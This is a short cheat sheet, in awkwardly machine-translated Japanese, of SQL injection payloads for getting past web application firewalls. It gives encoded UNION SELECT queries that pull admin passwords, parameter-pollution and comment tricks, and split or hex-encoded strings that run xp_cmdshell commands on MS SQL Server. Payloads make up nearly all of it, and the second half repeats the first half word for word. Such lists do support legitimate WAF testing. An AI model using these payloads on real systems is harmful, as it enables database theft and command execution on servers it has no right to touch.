[SQL注入]WAFを迂回する技術
2178 ワード
[SQL注入]WAFを迂回する技術
本文は各种の方法のWAFの総括で、私达はbypass WAFをテストして以下の方法を使うことができて、みんなに役に立つことを望みます.
URL encode(urlコード)
original payload:
?id=1 union select pass from admin limit 1
encode pyaload:
id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31
Unicode encode(unicode符号化)
original payload: ?id=1 union select pass from admin limit 1
encode pyaload: ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
HTTPパラメータ汚染/複雑パラメータバイパス
?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18&id=19%20from%28admin%29%29
?id=1&id=1//And//1=2//Union//Select/**/1,concat%28database%28%29,0x3a,user%28%29,0x3a,version%28%29%29,3
?id=1 union select 1&id=pass from admin
特殊文字汚染バイパス
//%00はNULLに等しく、空白文字は切断され、WAF解析時間のurlパラメータは/**/置換スペースに切り替えられ、%n%dに置換される.[NULL] ;%00 ;\x00, ||….
検索エンジンホワイトリストバイパス、バイパスエージェント
リクエストメソッドのバイパス
Change GET to POST, POST to GET …
GET /id=1 union select 1,2,3,4
POST id=1 union select 1,2,3,4
Encoding Bypass(urlencoded/from-data)(符号化バイパス)
The keyword split bypass(キーワードカット)
?id=1;EXEC(‘ma’+’ster..x’+’p_cm’+’dsh’+’ell “net user”‘)
Database special syntax bypass
?id=1.union%0aselect@1,2 ,!3,4
Use the comment statement to bypass( )
UNION /**/Select/**/user,pwd,from tbluser
HEX bypass(hex迂回)
0x730079007300610064006D0069006E00 =hex(sysadmin) 0x640062005F006F0077006E0065007200 =hex(db_owner)
?id=1;declare%20@a%20sysname%20select
@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;–
GET Parameter SQL Injection%0 A Line Break Pollution Bypass(sql注入GETパラメータ断線汚染迂回)
?id=-11%0Aunion%0Aselect 1,2,3,4
https://securityonline.info/2016/11/08/sql-injection-some-techique-to-bypass-waf/
original payload:
?id=1 union select pass from admin limit 1
encode pyaload:
id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31
original payload: ?id=1 union select pass from admin limit 1
encode pyaload: ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18&id=19%20from%28admin%29%29
?id=1&id=1//And//1=2//Union//Select/**/1,concat%28database%28%29,0x3a,user%28%29,0x3a,version%28%29%29,3
?id=1 union select 1&id=pass from admin
Change GET to POST, POST to GET …
GET /id=1 union select 1,2,3,4
POST id=1 union select 1,2,3,4
?id=1;EXEC(‘ma’+’ster..x’+’p_cm’+’dsh’+’ell “net user”‘)
?id=1.union%0aselect@1,2 ,!3,4
Use the comment statement to bypass( )
UNION /**/Select/**/user,pwd,from tbluser